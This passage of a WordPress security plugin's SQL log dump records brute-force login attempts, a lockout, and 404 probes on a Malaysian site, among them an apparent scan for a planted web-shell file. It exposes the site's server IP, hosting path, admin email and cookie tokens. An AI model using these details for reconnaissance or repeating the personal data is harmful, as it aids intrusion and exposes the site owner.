Notification\";}','debug','2019-09-26 02:36:17','2019-09-26 02:36:12',31892576,32718304,'https://bintara.com.my/test/wp-login.php',1,0,'110.4.45.222'),(27072,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=6fa9cf34c9cf1f63d09c13e3c78f59f3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwlqI3Q4OJOIh3RJklMcwAAAI0\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"124.217.235.145\";s:11:\"REMOTE_PORT\";s:5:\"49374\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwlqI3Q4OJOIh3RJklMcwAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569465768.4704\";s:12:\"REQUEST_TIME\";s:10:\"1569465768\";}}','notice','2019-09-26 02:42:50','2019-09-26 02:42:48',31178752,32715232,'https://bintara.com.my/wp/wp-login.php',1,0,'124.217.235.145'),(27068,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-26 02:20:26','2019-09-26 02:20:24',31886632,32715064,'https://bintara.com.my/2019/wp-login.php',1,0,'182.239.43.161'),(27069,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=2615828d445562a0525abcefcd288cbf\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwkHI3Q4OJOIh3RJklKzgAAAIc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"110.4.45.222\";s:11:\"REMOTE_PORT\";s:5:\"41006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwkHI3Q4OJOIh3RJklKzgAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569465372.5576\";s:12:\"REQUEST_TIME\";s:10:\"1569465372\";}}','notice','2019-09-26 02:36:17','2019-09-26 02:36:12',31188568,32718304,'https://bintara.com.my/test/wp-login.php',1,0,'110.4.45.222'),(27067,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 10:20:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-26 02:20:24\";s:14:\"lockout_expire\";s:19:\"2019-09-30 14:20:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 06:20:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-26 02:20:26','2019-09-26 02:20:24',31263888,32715064,'https://bintara.com.my/2019/wp-login.php',1,0,'182.239.43.161'),(27066,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=6aca45f962fc5cd85dc364802c0d7a64\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwgZ3IO9r9oxFSVqE@TxgAAAMw\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"182.239.43.161\";s:11:\"REMOTE_PORT\";s:5:\"35352\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwgZ3IO9r9oxFSVqE@TxgAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569464423.3702\";s:12:\"REQUEST_TIME\";s:10:\"1569464423\";}}','notice','2019-09-26 02:20:26','2019-09-26 02:20:24',31182504,32715064,'https://bintara.com.my/2019/wp-login.php',1,0,'182.239.43.161'),(27065,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:40:\"/wp-includes/js/jquery/ui/jquery.img.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"142-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"142-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"142-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/wp-includes/js/jquery/ui/jquery.img.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:40:\"/wp-includes/js/jquery/ui/jquery.img.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYwgOo3Q4OJOIh3RJklHxAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:62:\"https://bintara.com.my/wp-includes/js/jquery/ui/jquery.img.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:40:\"/wp-includes/js/jquery/ui/jquery.img.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwgOo3Q4OJOIh3RJklHxAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"139.99.149.91\";s:11:\"REMOTE_PORT\";s:5:\"44932\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:62:\"https://bintara.com.my/wp-includes/js/jquery/ui/jquery.img.php\";s:10:\"SCRIPT_URL\";s:40:\"/wp-includes/js/jquery/ui/jquery.img.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwgOo3Q4OJOIh3RJklHxAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569464378.8302\";s:12:\"REQUEST_TIME\";s:10:\"1569464378\";}}','notice','2019-09-26 02:19:41','2019-09-26 02:19:39',30786448,32598848,'https://bintara.com.my/wp-includes/js/jquery/ui/jquery.img.php',1,0,'139.99.149.91'),(27064,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"57904\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwVeMIxHKnBK@s1FldkYgAAAUU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569461624.9945\";s:12:\"REQUEST_TIME\";s:10:\"1569461624\";}}','notice','2019-09-26 01:33:46','2019-09-26 01:33:45',30820600,32643704,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27063,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"5E0E9F5B-23AA-40D6-8E15-D0BD6F4B2EC6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwU8RUSlOK4dwtqdubcDAAAAFI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"50544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwU8RUSlOK4dwtqdubcDAAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569461489.6128\";s:12:\"REQUEST_TIME\";s:10:\"1569461489\";}}','notice','2019-09-26 01:31:31','2019-09-26 01:31:30',31093248,32906224,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.128'),(27062,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"202-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"C5301E2D-2B73-43A6-BFB8-39D2803F21EB\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"202-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwRGXIO9r9oxFSVqE@OPgAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"49720\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwRGXIO9r9oxFSVqE@OPgAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569460506.1735\